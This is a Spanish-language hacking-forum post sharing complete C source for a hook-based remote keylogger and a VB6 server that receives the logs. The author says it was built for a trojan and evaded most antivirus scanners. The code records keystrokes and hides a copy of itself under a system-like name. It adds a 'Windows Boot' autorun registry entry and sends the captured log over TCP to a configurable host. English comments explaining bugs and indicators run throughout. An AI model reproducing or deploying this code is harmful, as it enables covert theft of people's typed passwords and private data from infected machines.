[C/C++][Source] Keylogger remoto con Hook sin DLL

Iniciado por xxneeco83xx, Julio 23, 2015, 02:46:13 AM



Julio 23, 2015, 02:46:13 AM Ultima modificación: Julio 23, 2015, 10:59:58 AM por Expermicid
¡Hola! ;D andaba jugando un poco con los threads y los hooks, y se me ocurrió hacer un mini keylogger.
Para agregarle a un troyano que tengo casi terminado, que también tengo pensado postear.
Pero al final veo que me quedaré con otro método que tengo.
Este método lo analicé y me dio 2/56 antivirus.
Este se autoagrega al registro y crea un hook de teclado y mouse. Funciona con un servidor que lo que hace es conectarse, recibir el log y cerrarse.
Tiene muchas cosas por mejorar, pero quizás a alguien le interese y le sirva, pues bien.
En fin, su método de trabajo es así: captura todo tipo de tecla y, cuando detecta una conexión del cliente (conexión inversa), envía el log, borra el antiguo y sigue esperando otra conexión.

Código: c

#include <windows.h>
#include <stdio.h>
#include <winsock2.h>

/* Build-time configuration of the collection endpoint. Connect() opens a
 * TCP stream to host_name:port_number, so these two values are the network
 * indicator of a given build. The defaults are the author's placeholders
 * (loopback, TCP/100); a real build would override them via -D. */
#ifndef port_number
#define port_number 100
#endif

#ifndef host_name
#define host_name "127.0.0.1"
#endif

/* Forward declarations. SendFile, Connect and InyectSystem carry a
 * timer-callback style signature but are only ever started through
 * CreateThread (cast to LPTHREAD_START_ROUTINE at the call sites); none of
 * their parameters is ever read. */
void CALLBACK SendFile ( HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime );
void CALLBACK Connect ( HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime );
void CALLBACK InyectSystem ( HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime );
LRESULT CALLBACK Keyboard ( int nCode, WPARAM wParam, LPARAM lParam );
DWORD WINAPI Inyect ( LPVOID lParam );

/* All state is file-global and is shared between the many threads the
 * program spawns (one InyectSystem thread per hook event, one Connect thread
 * per InyectSystem, one SendFile thread per Connect) with no locking. The
 * named mutex below is only used for the single-instance check, not for
 * protecting these globals. */
HHOOK hHook, MouseHook;
MSG msg;
/* cbSize is the in/out size argument for RegQueryValueExA and is updated by
 * that call, so it does not stay 256 across InyectSystem invocations. */
DWORD thread, firstthread, dwBytes, threadconnect, cbSize = 256, SizeX, sendthread;
HANDLE Thread, FirstThread, ThreadConnect, FileX, Mutex, SendThread;

/* Heap buffers used by SendFile/InyectSystem; BufferX is never freed. */
LPSTR AppName, Directory, Buffer, BufferX;

FILE *keylog;
/* Path of the on-disk log; zero-initialised and filled lazily in Keyboard
 * (it tests lstrlenA(keylogger) <= 0 to decide whether to build it). */
char keylogger [ MAX_PATH + 1 ];
HKEY key;

/* Data is only used as an opaque 256-byte scratch buffer for
 * RegQueryValueExA; the PERF_DATA_BLOCK type is incidental. */
PPERF_DATA_BLOCK Data;
WSADATA wsa;
WORD wVersion;
SOCKADDR_IN address;
SOCKET sock;
struct hostent * host;

/* Thread body (the timer-style parameters are unused): reads the whole log
 * file into memory, sends it in one send() call over the already-connected
 * global socket, and deletes the file when the send did not fail. Started by
 * Connect, which also tears the socket down once its 5 s wait ends, so
 * closesocket/WSACleanup below run twice per transmission. */
void CALLBACK SendFile ( HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime )
{

// Open the log built by Keyboard. If it does not exist yet the connection
// is closed without sending anything.
FileX = CreateFile ( keylogger, GENERIC_READ, FILE_SHARE_READ, 0,
OPEN_EXISTING, 0, 0 );

if ( FileX == INVALID_HANDLE_VALUE )
{
closesocket ( sock );
WSACleanup ();

return;
}

// Whole-file read into a fresh buffer; 0x0040 is GMEM_ZEROINIT, so the extra
// byte stays a NUL terminator. Neither the GlobalAlloc nor the ReadFile
// result is checked, and BufferX is never GlobalFree'd (one leak per send).
SizeX = GetFileSize ( FileX, 0 );
BufferX = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( SizeX + 1 ) );
ReadFile ( FileX, BufferX, SizeX, &dwBytes, 0 );
CloseHandle ( FileX );

// The log goes on the wire as-is: no framing, no encoding, no encryption.
// Only SOCKET_ERROR is treated as failure, so a partial send still counts
// as success and still leads to deletion of the file below.
if ( send ( sock, BufferX, SizeX, 0 ) == SOCKET_ERROR )
{
printf ( "[ Error al enviar Log ]\n" );
}
else
{
printf ( "[ Exito al enviar log ]\n" );
// Delete the log that was just sent.
DeleteFileA ( keylogger );
}

closesocket ( sock );
WSACleanup ();

return;

}

/* Thread body (the timer-style parameters are unused): one outbound TCP
 * connection attempt to host_name:port_number — the sample is the client,
 * the VB6 program further down is the listener. On success the global
 * socket is handed to a SendFile thread, which gets at most 5 s before the
 * socket and Winsock are closed here regardless of whether it finished.
 * Because InyectSystem starts one Connect thread per hook event, this
 * function runs (and beacons) once per keyboard or mouse event. */
void CALLBACK Connect ( HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime )
{

wVersion = MAKEWORD ( 2, 2 );
ZeroMemory ( &address, sizeof ( SOCKADDR_IN ) );

// Winsock is initialised and cleaned up per call (and cleaned up a second
// time inside SendFile).
if ( WSAStartup ( wVersion, &wsa ) != NO_ERROR )
{
printf ( " [ Error al inicializar el winsock ] \n" );
WSACleanup ();

return;
}

sock = socket ( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ( sock == INVALID_SOCKET )
{
printf ( " [ Error al intentar crear socket ] \n" );
closesocket ( sock );
WSACleanup ();

return;
}

// The gethostbyname result is dereferenced without a NULL check, so an
// unresolvable host_name (or no DNS) crashes this thread rather than
// returning. sin_zero was already cleared by the ZeroMemory above.
host = gethostbyname ( host_name );

address.sin_family = AF_INET;
address.sin_addr = *( ( struct in_addr * ) host -> h_addr_list [ 0 ] );
address.sin_port = htons ( port_number );
memset ( address.sin_zero, 0, 8 );

if ( connect ( sock, ( SOCKADDR *)&address, sizeof ( SOCKADDR ) ) != 0 )
{
printf ( " [ Error al intentar conectar con el servidor ] \n" );
closesocket ( sock );
WSACleanup ();

return;
}

printf ( " [ Conexion establecida con el servidor ]\n" );

// SendFile shares the global sock; if it is still sending when the 5 s
// timeout elapses, the closesocket below races with it. The thread handle
// is never closed.
SendThread = CreateThread ( 0, 0, ( LPTHREAD_START_ROUTINE )SendFile, 0, 0, &sendthread );
if ( SendThread )
{
WaitForSingleObject ( SendThread, 5000 );
}

closesocket ( sock );
WSACleanup ();

return;

}

/* Thread body (the timer-style parameters are unused), started from Keyboard
 * on every hook event and from the loop in Inyect: first spawns a Connect
 * thread, then (re)applies persistence. Host artifacts it produces:
 *   - a copy of the running executable at %HomeDrive%\userboot.exe, with the
 *     read-only, hidden and system attributes set;
 *   - a REG_SZ value named "Windows Boot" under
 *     HKLM\Software\Microsoft\Windows\CurrentVersion\Run pointing at it.
 * Opening that HKLM key with KEY_SET_VALUE needs an elevated token; on a
 * standard-user token RegOpenKeyExA is expected to fail and the registry
 * step is silently skipped. The ThreadConnect handle is never closed. */
void CALLBACK InyectSystem ( HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime )
{

ThreadConnect = CreateThread ( 0, 0, ( LPTHREAD_START_ROUTINE ) Connect, 0, 0, &threadconnect );

// Path of the running image (0x0040 = GMEM_ZEROINIT).
AppName = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 ) );
GetModuleFileNameA ( GetModuleHandleA ( 0L ), AppName, MAX_PATH );

// Destination: "<HomeDrive>\userboot.exe". The CopyMemory length is
// lstrlenA("userboot.exe")+1 = 13, i.e. the 13 characters of "\userboot.exe"
// without its NUL; the string stays terminated only because the buffer was
// zero-initialised.
Directory = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 ) );
GetEnvironmentVariableA ( "HomeDrive", Directory, MAX_PATH );

CopyMemory ( & Directory [ lstrlenA ( Directory ) ], &"\\userboot.exe", lstrlenA ( "userboot.exe" ) + 1 );

// bFailIfExists = true: an existing copy is never overwritten. (`true` is not
// a C keyword before C23 — presumably the file is built as C++ or with
// <stdbool.h> pulled in indirectly.)
CopyFileA ( AppName, Directory, true );

if ( RegOpenKeyExA ( HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &key ) == ERROR_SUCCESS )
{
// Data is a scratch buffer for the existence probe; it is allocated with
// LocalAlloc but released with GlobalFree (mismatched allocator pair).
Data = ( PPERF_DATA_BLOCK ) LocalAlloc ( ( 0x0000 | 0x0040 ), 256 );
// The Run value is written only if it does not already exist. Its length
// is passed as (BYTE)lstrlenA(Directory): truncated to 8 bits and without
// the terminating NUL a REG_SZ normally includes.
if ( RegQueryValueExA ( key, "Windows Boot", 0, 0, ( LPBYTE ) Data, &cbSize ) != ERROR_SUCCESS )
{
RegSetValueExA ( key, "Windows Boot", 0, REG_SZ, (const unsigned char*) Directory, ( BYTE ) lstrlenA ( Directory ) );
}

// 0x1 | 0x2 | 0x4 = FILE_ATTRIBUTE_READONLY | HIDDEN | SYSTEM on the copy.
SetFileAttributesA ( Directory, ( 0x1 | 0x2 | 0x4 ) );

GlobalFree ( Data );
}

// Closed unconditionally, even when the open above failed and key still
// holds whatever the global contained before.
RegCloseKey ( key );

GlobalFree ( AppName );
GlobalFree ( Directory );

return;

}

/* Low-level hook procedure. Inyect installs it twice: as the WH_KEYBOARD_LL
 * proc and as the WH_MOUSE_LL proc. Every invocation — key or mouse event,
 * including nCode < 0 — first spawns an InyectSystem thread (which spawns a
 * Connect thread), so each input event triggers a persistence pass and an
 * outbound connection attempt; that is the sample's most visible behaviour
 * on the host and on the network. Only WM_KEYDOWN is logged: mouse events,
 * and WM_SYSKEYDOWN (Alt combinations), fall through to CallNextHookEx.
 * The log file is %windir%\logger.inf. */
LRESULT CALLBACK Keyboard ( int nCode, WPARAM wParam, LPARAM lParam )
{

// Lazily build the log path the first time the hook fires.
if ( lstrlenA ( keylogger ) <= 0 )
{
wsprintfA ( keylogger, "%s\\logger.inf", getenv ( "windir" ) );
}

// One new thread per hook event; the handle is overwritten and never closed.
Thread = CreateThread ( 0, 0, ( LPTHREAD_START_ROUTINE ) InyectSystem, 0, 0, &thread );

if ( nCode < 0 )
{
return CallNextHookEx ( hHook, nCode, wParam, lParam );
}

if ( wParam == WM_KEYDOWN )
{
// Valid only for the keyboard hook; mouse events never reach this branch
// because their wParam is a WM_MOUSE* message, not WM_KEYDOWN.
PKBDLLHOOKSTRUCT teclado = ( PKBDLLHOOKSTRUCT ) lParam;

// Opened and closed per keystroke; the result is not checked. %windir% is
// normally not writable for a standard user, in which case keylog would be
// NULL and the fprintf calls below dereference it.
keylog = fopen ( keylogger, "a+" );

// Only Enter (VK 13), the numpad digits and Esc are translated. Every other
// key writes the raw virtual-key code as a single byte, so the log holds VK
// values rather than typed text: letters appear as uppercase ASCII (VK_A..Z
// equal 'A'..'Z'), shift state is lost, and punctuation keys show up as
// unrelated bytes.
switch ( teclado -> vkCode )
{

case 13:
fprintf ( keylog, "\n" );
break;

case VK_NUMPAD0:
fprintf ( keylog, "0" );
break;

case VK_NUMPAD1:
fprintf ( keylog, "1" );
break;

case VK_NUMPAD2:
fprintf ( keylog, "2" );
break;

case VK_NUMPAD3:
fprintf ( keylog, "3" );
break;

case VK_NUMPAD4:
fprintf ( keylog, "4" );
break;

case VK_NUMPAD5:
fprintf ( keylog, "5" );
break;

case VK_NUMPAD6:
fprintf ( keylog, "6" );
break;

case VK_NUMPAD7:
fprintf ( keylog, "7" );
break;

case VK_NUMPAD8:
fprintf ( keylog, "8" );
break;

case VK_NUMPAD9:
fprintf ( keylog, "9" );
break;

case VK_ESCAPE:
fprintf ( keylog, " [ ESC ]" );
break;

default:
fprintf ( keylog, "%c", teclado -> vkCode );
}

// lParam points at a system-owned KBDLLHOOKSTRUCT, not a malloc'd block;
// passing it to free() is invalid (heap corruption / crash risk).
free ( teclado );

fclose ( keylog );
}

return CallNextHookEx ( hHook, nCode, wParam, lParam );
}

/* Hook thread, started from WinMain. Installs two global (thread id 0)
 * low-level hooks with this executable's module handle — WH_*_LL hooks run
 * in the installing thread, which is why no DLL is injected ("sin DLL") —
 * and then parks in GetMessage so the hooks stay serviced. lParam is unused. */
DWORD WINAPI Inyect ( LPVOID lParam )
{

// Intended single-instance check. GetLastError is per-thread, and
// CreateMutexA("JOKER") was called on the main thread in WinMain, so the
// ERROR_ALREADY_EXISTS from that call is not visible here; this thread only
// sees its own (so far empty) error state.
if ( GetLastError () == ERROR_ALREADY_EXISTS )
{
ExitProcess ( 0 );
}

// The same procedure serves both hooks; see Keyboard for how mouse events
// are handled.
hHook = SetWindowsHookEx ( WH_KEYBOARD_LL , (HOOKPROC) Keyboard, GetModuleHandleA ( 0L ), 0L );
MouseHook = SetWindowsHookEx ( WH_MOUSE_LL, (HOOKPROC) Keyboard, GetModuleHandleA ( 0L ), 0L );

// The body runs only when GetMessage returns 0 (WM_QUIT). This thread owns
// no window, so presumably GetMessage simply blocks here for the life of
// the process while the hook callbacks are delivered; the first message it
// does return ends the loop and removes the hooks.
while ( ! GetMessage ( & msg, 0, 0, 0 ) )
{
Thread = CreateThread ( 0, 0, ( LPTHREAD_START_ROUTINE ) InyectSystem, 0, 0, &thread );

TranslateMessage ( &msg );
DispatchMessage ( &msg );
}

UnhookWindowsHookEx ( hHook );
UnhookWindowsHookEx ( MouseHook );

return 0;

}

/* Entry point. Creates the named mutex "JOKER" (a host artifact by which a
 * running instance can be recognised), starts the hook thread and blocks on
 * it for the life of the process. The instance/command-line arguments are
 * unused. */
int APIENTRY WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
LPSTR lpszArgument, int nCmdFustil )
{

// Neither the handle nor GetLastError is examined here; the
// ERROR_ALREADY_EXISTS check lives in Inyect, on a different thread.
Mutex = CreateMutexA ( 0, 0, "JOKER" );

FirstThread = CreateThread ( 0, 0, ( LPTHREAD_START_ROUTINE )Inyect, 0, 0, &firstthread );

// Inyect normally never returns, so the process lives until it is killed.
if ( FirstThread )
{
WaitForSingleObject ( FirstThread, INFINITE );
}

ReleaseMutex ( Mutex );
CloseHandle ( Mutex );
CloseHandle ( FirstThread );

return EXIT_SUCCESS;
}



Y el del servidor es simple: en VB6 crean un control Winsock con el nombre Winsock1 y su código.

Código: vb

' Receiver side (VB6): start listening on the Winsock1 control. The listening
' port is not set in this code, so presumably it comes from the control's
' LocalPort property (not shown in this listing).
Private Sub Form_Load()
Winsock1.Listen
End Sub

' Accepts any incoming connection. State 0 is sckClosed; if the control is in
' any other state it is closed first so the new request can be accepted on
' the same control. The peer's address is not checked.
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> 0 Then
    Winsock1.Close
End If

Winsock1.Accept requestID
End Sub

' Reads whatever has arrived as one string, appends it to keylogger.txt in the
' application folder, then terminates the program with End. Only the data
' available in this first event is stored; a log that arrives in several
' pieces would presumably be cut off. No error handling around the file I/O.
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim Data As String
Winsock1.GetData Data

Open App.Path & "\keylogger.txt" For Append As #1
Print #1, Data
Close #1

End
End Sub

' Any socket error terminates the program; the error is not logged.
Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
End
End Sub



Es todo, espero que les guste, y se aceptan críticas.
El arte de crear malware, es algo que solo pocos entienden!